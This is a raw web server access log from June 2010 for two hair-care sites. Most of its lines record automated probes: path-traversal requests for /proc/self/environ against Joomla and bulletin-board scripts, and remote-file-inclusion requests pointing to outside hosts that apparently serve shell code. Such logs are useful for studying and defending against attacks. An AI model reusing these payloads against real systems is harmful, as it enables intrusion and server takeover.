216.131.96.193 - - [28/Jun/2010:07:54:59 -0700] "GET /logs/access_100531.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:54:59 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:54:59 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:55:07 -0700] "GET /logs/access_100531.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:07:56:16 -0700] "GET /logs/access.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.162.118.240 - - [28/Jun/2010:07:56:17 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.162.118.240 - - [28/Jun/2010:07:56:17 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.120.237.104 - - [28/Jun/2010:07:58:01 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.120.237.104 - - [28/Jun/2010:07:58:01 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.120.237.104 - - [28/Jun/2010:07:58:01 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:07:58:43 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:07:58:43 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
216.120.237.104 - - [28/Jun/2010:07:59:52 -0700] "GET /logs/access.log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.120.237.104 - - [28/Jun/2010:07:59:52 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.120.237.104 - - [28/Jun/2010:07:59:52 -0700] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:08:00:16 -0700] "GET /logs/access_100503.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:08:00:17 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:08:00:17 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:08:00:31 -0700] "GET /logs/access.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:08:00:31 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:08:00:31 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:08:00:37 -0700] "GET /logs/access_100531.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:08:01:56 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:08:01:56 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
208.115.111.245 - - [28/Jun/2010:08:02:06 -0700] "GET /?N=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:08:02:10 -0700] "GET /tmp/?D=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:08:02:14 -0700] "GET /tmp/?M=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:08:02:54 -0700] "GET /tmp/?N=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:08:03:00 -0700] "GET /tmp/?S=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:08:03:05 -0700] "GET /?N=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:08:03:11 -0700] "GET /tmp/?D=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:08:03:16 -0700] "GET /tmp/?M=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:08:03:21 -0700] "GET /tmp/?N=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:08:03:26 -0700] "GET /tmp/?S=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:08:07:11 -0700] "GET /logs/access.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:08:07:11 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:08:07:11 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:11:23 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:11:24 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:11:24 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:12:15 -0700] "GET /logs/access.log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:12:15 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:12:15 -0700] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:12:26 -0700] "GET /logs/access.log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:12:26 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:12:26 -0700] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:12:51 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:12:51 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:12:51 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.40.37.133 - - [28/Jun/2010:08:14:24 -0700] "GET //bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
188.40.37.133 - - [28/Jun/2010:08:16:48 -0700] "GET //bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:16:55 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:16:55 -0700] "GET /logs/access_100607.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:16:55 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:17:04 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:17:04 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
206.71.53.4 - - [28/Jun/2010:08:17:04 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
206.71.53.4 - - [28/Jun/2010:08:17:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
206.71.53.4 - - [28/Jun/2010:08:17:05 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:17:05 -0700] "GET /logs/access_100607.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.64.99 - - [28/Jun/2010:08:17:46 -0700] "GET /logs///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.64.99 - - [28/Jun/2010:08:17:46 -0700] "GET //bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
188.40.37.133 - - [28/Jun/2010:08:18:17 -0700] "GET /logs///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
188.40.37.133 - - [28/Jun/2010:08:18:18 -0700] "GET //bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
91.121.64.99 - - [28/Jun/2010:08:20:13 -0700] "GET /logs/access_100412.log///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.64.99 - - [28/Jun/2010:08:20:13 -0700] "GET //bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.64.99 - - [28/Jun/2010:08:20:14 -0700] "GET /logs///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.64.99 - - [28/Jun/2010:08:20:17 -0700] "GET /logs/access_100301.log///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
193.105.210.163 - - [28/Jun/2010:08:20:28 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "www.freehairsecrets.com"
193.105.210.163 - - [28/Jun/2010:08:20:28 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "www.freehairsecrets.com"
188.40.37.133 - - [28/Jun/2010:08:20:51 -0700] "GET /logs/access_100412.log///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
188.40.37.133 - - [28/Jun/2010:08:20:52 -0700] "GET //bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
188.40.37.133 - - [28/Jun/2010:08:20:52 -0700] "GET /logs///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
188.40.37.133 - - [28/Jun/2010:08:20:58 -0700] "GET /logs/access_100301.log///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
64.34.165.224 - - [28/Jun/2010:08:21:31 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:21:31 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:21:31 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:21:32 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:21:32 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:21:32 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.40.37.133 - - [28/Jun/2010:08:22:20 -0700] "GET /logs/access_100301.log///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
188.40.37.133 - - [28/Jun/2010:08:22:21 -0700] "GET //bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
188.40.37.133 - - [28/Jun/2010:08:22:21 -0700] "GET /logs///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:22:44 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:22:50 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.22.67.37 - - [28/Jun/2010:08:22:53 -0700] "GET /logs/access_100607.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.22.67.37 - - [28/Jun/2010:08:22:54 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.22.67.37 - - [28/Jun/2010:08:22:54 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:23:07 -0700] "GET /logs/access.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.228.107.2 - - [28/Jun/2010:08:23:07 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.228.107.2 - - [28/Jun/2010:08:23:08 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.228.107.2 - - [28/Jun/2010:08:23:11 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.228.107.2 - - [28/Jun/2010:08:23:11 -0700] "GET /logs/access.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.228.107.2 - - [28/Jun/2010:08:23:12 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
